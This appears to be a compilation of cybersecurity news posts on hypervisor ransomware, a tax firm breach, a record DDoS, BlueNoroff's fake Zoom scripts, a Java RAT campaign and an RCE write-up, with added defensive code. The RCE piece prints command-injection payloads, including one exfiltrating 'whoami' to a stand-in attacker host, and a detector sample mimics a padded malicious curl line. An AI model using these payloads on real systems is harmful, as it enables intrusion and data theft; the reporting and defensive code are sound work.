
Hypervisor Ransomware Threat Grows: MITRE ATT&CK v17 Puts C-Suite on Alert

 

The latest update to the MITRE ATT&CK framework—version 17—has brought hypervisor security into sharp focus, prompting a necessary shift in how organizations view the core of their virtualized infrastructure. For the first time, VMware ESXi hypervisors have received a dedicated matrix within the widely adopted framework, underscoring their growing vulnerability to targeted cyberattacks. This move serves as a wake-up call for executive leadership: hypervisor security is no longer just a technical concern, but a strategic imperative. 

As enterprises increasingly rely on virtual machines to run mission-critical workloads and store sensitive data, any compromise at the hypervisor level can have devastating consequences. A single attack could trigger operational downtime, lead to failed audits, and expose the organization to compliance violations and regulatory scrutiny. Experts warn that unaddressed ESXi vulnerabilities may even be classified as preventable lapses in due diligence. 

Compounding the issue is the fact that many organizations still lack defined incident response playbooks tailored to hypervisor attacks. With MITRE ATT&CK now mapping tactics used to breach, move laterally, and deploy ransomware within hypervisors, the risks are no longer theoretical—they are measurable and real. 

To mitigate them, leadership must champion a security strategy that includes robust access controls such as multi-factor authentication, role-based permissions, lockdown policies, and virtual patching to cover unpatched or zero-day vulnerabilities. Additionally, organizations are urged to deploy runtime monitoring and align defences with the MITRE ATT&CK framework to improve security posture and audit readiness. Failing to address this blind spot could cost companies more than just operational delays—it could lead to loss of customer trust and reputational damage. 

As threat actors grow more sophisticated, overlooking the hypervisor layer is no longer an acceptable risk. The inclusion of ESXi in ATT&CK v17 represents a broader industry recognition that hypervisors must be part of the core cybersecurity conversation. For the C-suite, this means embracing their role in driving hypervisor resilience across security, infrastructure, and governance functions before an attack makes that decision for them.

Chaos Ransomware Strikes Optima Tax Relief, Leaks 69GB of Sensitive Customer Data

 

In a significant cybersecurity incident impacting the financial services sector, U.S.-based tax resolution firm Optima Tax Relief has reportedly suffered a ransomware attack orchestrated by the Chaos ransomware group. The attackers have allegedly exfiltrated and leaked approximately 69GB of data, including confidential corporate records and sensitive personal tax files.

The exposed information reportedly includes Social Security numbers, home addresses, phone contacts, and banking details — all highly valuable to identity fraudsters. Given the nature of tax records, cybersecurity experts caution that the risks for affected individuals could extend for years, as this type of data cannot simply be changed like passwords.

Chaos Group Increases Aggression 

The ransomware group behind the attack, known as Chaos, has been active since March 2025 and is rapidly gaining notoriety for targeting organisations with vast stores of personally identifiable information (PII). Unlike the earlier Chaos ransomware builder seen in 2021, this iteration appears to be a more organised threat actor, employing a strategic approach in selecting its victims. This isn’t their first major claim. In May, Chaos asserted responsibility for a breach involving The Salvation Army, though that incident has yet to be independently verified. 

Silence from Optima Raises Questions 

Optima Tax Relief has yet to release a public statement or acknowledge the breach, prompting concerns among cybersecurity professionals and affected customers. It is still unclear whether the company has reported the incident to federal authorities or regulators. The lack of transparency is drawing criticism over potential lapses in consumer notification, data handling, and compliance with data protection regulations. 

Recommendations for Affected Individuals

For anyone who has previously engaged Optima's services, cybersecurity analysts recommend treating their personal information as compromised. Immediate protective steps include:

1. Enrolling in identity theft protection services that offer credit and SSN monitoring 

2. Reviewing bank statements and credit card activity for suspicious transactions 

3. Requesting credit freezes or fraud alerts from financial institutions 

4. Using data removal tools to reduce digital exposure

5. Installing reputable antivirus software to fend off phishing or malware threats

6. Enabling two-factor authentication on all financial and sensitive accounts

A Warning for the Financial Sector 

This breach is part of a growing pattern in which ransomware groups are aggressively targeting organisations that store large volumes of sensitive consumer data — particularly in tax, legal, and healthcare sectors. Experts point out that financial firms, especially those involved in tax resolution, remain prime targets due to their often under-resourced cybersecurity infrastructure.

As investigations continue, pressure is mounting on Optima Tax Relief to disclose the extent of the damage and take accountability for customer safety moving forward.

Cloudflare Thwarts Record-Breaking DDoS Attack as Global Threat Escalates

 

Cloudflare has successfully blocked the largest distributed denial-of-service (DDoS) attack ever recorded, marking a significant moment in the escalating battle against cyber threats. The attack peaked at an unprecedented 7.3 terabits per second (Tbps), targeting an unnamed hosting provider and unleashing 37.4 terabytes of data in just 45 seconds. Cloudflare’s Magic Transit service absorbed the blow, which was composed almost entirely—99.996%—of User Datagram Protocol (UDP) flood attacks. 

While UDP is commonly used for real-time applications like streaming and gaming due to its speed, that same characteristic makes it vulnerable to exploitation in high-volume cyberattacks. The remaining 0.004% of the traffic—about 1.3 GBps—included various amplification and reflection attack methods such as NTP reflection, Echo reflection, Mirai UDP flood, and RIPv1 amplification. This sliver alone would be enough to cripple most unprotected systems. 

What set this attack apart wasn’t just volume but velocity—it carpet-bombed an average of 21,925 destination ports per second, with peaks reaching 34,517 ports on a single IP address. The attack originated from over 122,000 unique IP addresses spanning 161 countries, with the most significant traffic coming from Brazil, Vietnam, Taiwan, China, Indonesia, and Ukraine. This historic attack is part of a growing wave of DDoS incidents. In the first quarter of 2025 alone, Cloudflare mitigated 20.5 million DDoS attacks—a staggering 358% increase from the same period last year. Nearly 700 of these were hyper-volumetric attacks, averaging eight per day and overwhelmingly leveraging network-layer vulnerabilities via UDP floods. 

Earlier this year, Cloudflare had also defended against a 6.5 Tbps strike linked to the Eleven11bot botnet, composed of tens of thousands of compromised webcams and IoT devices.

The rise in DDoS activity is not just a technical issue—it’s being fueled by geopolitical tensions as well. According to Radware’s director of threat intelligence, Pascal Geenens, hacktivist DDoS attacks against U.S. targets surged by 800% in just two days in June, following U.S. involvement in the Israel-Iran conflict. Radware’s 2025 Global Threat Analysis Report highlights a 550% global increase in web-based DDoS attacks and a near 400% year-over-year growth in overall DDoS traffic volume. Experts warn that these attacks are only going to become more frequent and intense.

To counter this threat, experts recommend a multi-layered defense strategy. Partnering with specialized DDoS mitigation providers such as Cloudflare, Akamai, Imperva, or Radware is essential for organizations that lack the infrastructure to defend against large-scale attacks. Blocking traffic from known malicious Autonomous System Numbers (ASNs) and using geoblocking can filter out harmful sources, although attackers often bypass these measures with spoofed IPs or botnets. Distributing network infrastructure can prevent single points of failure, while configuring routers and firewalls to block unsafe protocols like ICMP and FTP adds an additional line of defense. Businesses are also advised to work closely with their internet service providers to filter unnecessary traffic upstream.

Deploying Web Application Firewalls (WAFs) is critical for defending against application-layer threats, and using multiple DNS providers with DNSSEC can ensure site availability even during attacks. Specialized tools like Wordfence for WordPress add another layer of protection for widely used platforms. Importantly, no single solution is sufficient. Organizations must adopt layered defenses and routinely test their systems through red team exercises using tools like HULK, hping3, or GoldenEye to identify vulnerabilities before attackers exploit them. Even small websites are no longer safe from DDoS campaigns. As cybersecurity journalist Steven Vaughan-Nichols noted, his personal site faces about a dozen DDoS attacks every week. In today's threat landscape, robust DDoS defense isn't a luxury—it’s a necessity.

North Korean Hackers Target Fintech and Gaming Firms with Fake Zoom Apps

 

A newly uncovered cyber campaign is targeting organizations across North America, Europe, and the Asia-Pacific by exploiting fake Zoom applications. Cybersecurity experts have traced the operation to BlueNoroff, a notorious North Korean state-backed hacking group affiliated with the Lazarus Group. The campaign’s primary focus is on the gaming, entertainment, and fintech sectors, aiming to infiltrate systems and steal cryptocurrency and other sensitive financial data. 

Attack strategy 

The attack begins with a seemingly innocuous AppleScript disguised as a routine maintenance operation for Zoom’s software development kit (SDK). However, hidden within the script—buried beneath roughly 10,000 blank lines—are malicious commands that quietly download malware from a counterfeit domain, zoom-tech[.]us. 

Once the malware is downloaded, it integrates itself into the system through LaunchDaemon, granting it persistent and privileged access at every system startup. This allows the malware to operate covertly without raising immediate alarms. The malicious software doesn’t stop there. It fetches additional payloads from compromised infrastructure, presenting them as legitimate macOS components like “icloud_helper” and “Wi-Fi Updater.” 

These files are designed with anti-forensics techniques to erase temporary files and conceal their activity, all while maintaining a hidden backdoor for remote control and data exfiltration. This deceptive approach is particularly dangerous in remote work environments, where minor software issues are often resolved without deep inspection—making it easier for such malware to slip past unnoticed. 

Motives behind the attack

BlueNoroff’s intent appears financially driven. The malware specifically searches for cryptocurrency wallet extensions, browser-stored login credentials, and authentication keys. In one known incident dated May 28, a Canadian online gambling platform fell victim to this scheme after its systems were compromised via a fraudulent Zoom troubleshooting script. 

Protection Measures for Organizations

Given the growing sophistication of such campaigns, security experts recommend several protective steps:

• Independently verify Zoom participants to ensure authenticity. 

• Block suspicious domains like zoom-tech[.]us at the firewall level. 

• Deploy comprehensive endpoint protection that can detect hidden scripts and unauthorized daemons. 

• Invest in reliable antivirus and ransomware protection, especially for firms with cryptocurrency exposure. 

• Use identity theft monitoring services to detect compromised credentials early. 

• Train employees to recognize and respond to social engineering attempts. 

• Secure digital assets with hardware wallets instead of relying on software-based solutions alone.
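The blank-line padding described above is easy to check for before a troubleshooting script is run. The following is an added example, not code from the original post or from any vendor: it flags content that follows a long run of blank lines and lists the hosts that hidden content references. The threshold, function names and sample script are assumptions constructed for illustration.

```python
import re

BLANK_RUN_THRESHOLD = 200            # assumption: tune to your own scripts
BLOCKED_DOMAINS = {"zoom-tech.us"}   # the domain the article lists, un-defanged
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def find_padded_regions(text, threshold=BLANK_RUN_THRESHOLD):
    """Return (line_no, blank_run) for content that follows a long blank run."""
    findings, run = [], 0
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():          # empty or whitespace-only line
            run += 1
            continue
        if run >= threshold:
            findings.append((line_no, run))
        run = 0
    return findings


def is_blocked(host):
    """True for a blocked domain or any of its subdomains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def triage_script(text, threshold=BLANK_RUN_THRESHOLD):
    """Report each padded region and the hosts referenced after it."""
    lines = text.splitlines()
    report = []
    for line_no, run in find_padded_regions(text, threshold):
        hosts = sorted({h.lower() for ln in lines[line_no - 1:]
                        for h in URL_HOST_RE.findall(ln)})
        report.append({
            "hidden_from_line": line_no,
            "blank_lines": run,
            "hosts": hosts,
            "blocked_hosts": [h for h in hosts if is_blocked(h)],
        })
    return report


# Constructed sample, not the real lure: a harmless-looking header,
# 10,000 blank lines, then one line that reaches out to the listed domain.
SAMPLE_SCRIPT = (
    "-- Zoom SDK maintenance\n"
    'display dialog "Updating..."\n'
    + "\n" * 10000
    + 'do shell script "curl https://zoom-tech.us/PLACEHOLDER"\n'
)

if __name__ == "__main__":
    for finding in triage_script(SAMPLE_SCRIPT):
        print(finding)
```
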

Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM. It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT

 

A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. By exploiting the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult. 

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that behind every cyberattack is a human being and that the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.”

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader to be “Oleg,” formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs.

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend.

Client-Side Regex: A False Sense of Security

The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question.

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities.

Bypassing Protections via Alternate HTTP Methods

The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency.

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.

Architectural Oversight and Security Best Practices

This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit.

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
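The server-side fix described above can be sketched as follows. This is an added example, not the application's own code: it enforces the article's username allowlist on the backend, rejects every HTTP method the endpoint does not need, logs rejections, and passes the value to the backend command as an argument vector instead of a shell string. The handler shape, the POST-only policy and the `lookup-user` path are assumptions.

```python
import re
from urllib.parse import parse_qs

# Same allowlist the article quotes for the frontend: /^[a-zA-Z0-9]{1,20}$/
USERNAME_RE = re.compile(r"[a-zA-Z0-9]{1,20}")

# Assumption: the UI only ever needs POST on this endpoint.
ALLOWED_METHODS = frozenset({"POST"})


def validate_username(raw):
    """Return the username if it passes the allowlist, else None."""
    # fullmatch() instead of match() with "$": in Python "$" also matches
    # just before a trailing newline, so "alice01\n" would slip through.
    if isinstance(raw, str) and USERNAME_RE.fullmatch(raw):
        return raw
    return None


def build_lookup_argv(username):
    """Hypothetical backend action, expressed as an argument vector.

    No shell parses this list, so ";" or "$(...)" in a value that somehow
    skipped validation could not start a second command.
    """
    return ["/usr/local/bin/lookup-user", "--", username]


def handle_request(method, body, audit_log):
    """Validate one form-encoded request; return (status, detail)."""
    method = method.upper()
    # The method check runs first, so no verb reaches the logic unvalidated.
    if method not in ALLOWED_METHODS:
        audit_log.append((method, "rejected: method not allowed"))
        return 405, "method not allowed"
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    values = fields.get("username", [])
    # Require exactly one value; a repeated parameter is ambiguous.
    username = validate_username(values[0]) if len(values) == 1 else None
    if username is None:
        audit_log.append((method, "rejected: username failed allowlist"))
        return 400, "invalid username"
    return 200, build_lookup_argv(username)


# Constructed requests; the two payloads are the ones quoted in the article.
SAMPLE_REQUESTS = [
    ("POST", "username=alice01"),
    ("PUT", "username=;id;"),
    ("POST", "username=;curl http://attacker-controlled.com/$(whoami);"),
    ("POST", "username=alice01%0A"),
]


def run_samples():
    """Run the sample requests; return their statuses and the audit log."""
    log = []
    statuses = [handle_request(m, b, log)[0] for m, b in SAMPLE_REQUESTS]
    return statuses, log


if __name__ == "__main__":
    print(run_samples())
```
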